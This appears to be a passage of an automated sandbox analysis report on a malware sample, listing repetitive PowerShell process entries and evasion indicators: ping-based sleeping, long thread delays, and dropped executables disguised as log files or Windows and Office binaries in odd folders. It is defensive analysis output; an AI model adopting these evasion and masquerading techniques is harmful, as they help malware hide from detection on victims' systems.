                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Uses ping.exe to sleep
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeMemory allocated: 1AF50000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeMemory allocated: 1B310000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeMemory allocated: 16D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeMemory allocated: 1B1F0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\ctfmon.exeMemory allocated: DD0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\ctfmon.exeMemory allocated: 1A7C0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Recovery\ctfmon.exeMemory allocated: 17F0000 memory reserve | memory write watch
                            Source: C:\Recovery\ctfmon.exeMemory allocated: 1B100000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeMemory allocated: 10C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeMemory allocated: 1AEB0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeMemory allocated: C40000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeMemory allocated: 1A620000 memory reserve | memory write watch
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeMemory allocated: 990000 memory reserve | memory write watch
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeMemory allocated: 1A650000 memory reserve | memory write watch
                            Source: C:\Recovery\ctfmon.exeMemory allocated: B20000 memory reserve | memory write watch
                            Source: C:\Recovery\ctfmon.exeMemory allocated: 1A6F0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599859Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599734Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599625Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599502Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599375Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599266Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599141Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 599031Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 598915Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596734Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596604Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596499Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596370Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596203Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 596009Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 595828Jump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\ctfmon.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Recovery\ctfmon.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\ctfmon.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeWindow / User API: threadDelayed 5423Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3666
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3610
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2970
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3122
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3396
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3163
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDropped PE file which has not been started: C:\Users\user\Desktop\QMBYhgjh.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDropped PE file which has not been started: C:\Users\user\Desktop\rUslzROg.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDropped PE file which has not been started: C:\Users\user\Desktop\yRglcgIV.logJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDropped PE file which has not been started: C:\Users\user\Desktop\PYxQwTnj.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDropped PE file which has not been started: C:\Users\user\Desktop\KlfRTWYv.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDropped PE file which has not been started: C:\Users\user\Desktop\zxBbjKdN.logJump to dropped file
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -600000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -599859s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -599734s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -599625s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -599502s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -599375s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -599266s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -599141s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -599031s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -598915s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -100000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -99891s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -99781s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -99672s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -99563s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -99438s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -99313s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -99175s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -99047s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -98937s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -98821s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -98689s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -98563s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -98437s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -98328s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -98219s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -98110s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -97985s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -596734s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -596604s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -596499s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -596370s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -596203s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -596009s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1540Thread sleep time: -595828s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 6488Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 4892Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe TID: 3768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exe TID: 776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Recovery\ctfmon.exe TID: 5776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Recovery\ctfmon.exe TID: 3816Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe TID: 3152Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe TID: 3700Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 1224Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exe TID: 6416Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep count: 3666 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6196Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep count: 3610 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 2970 > 30
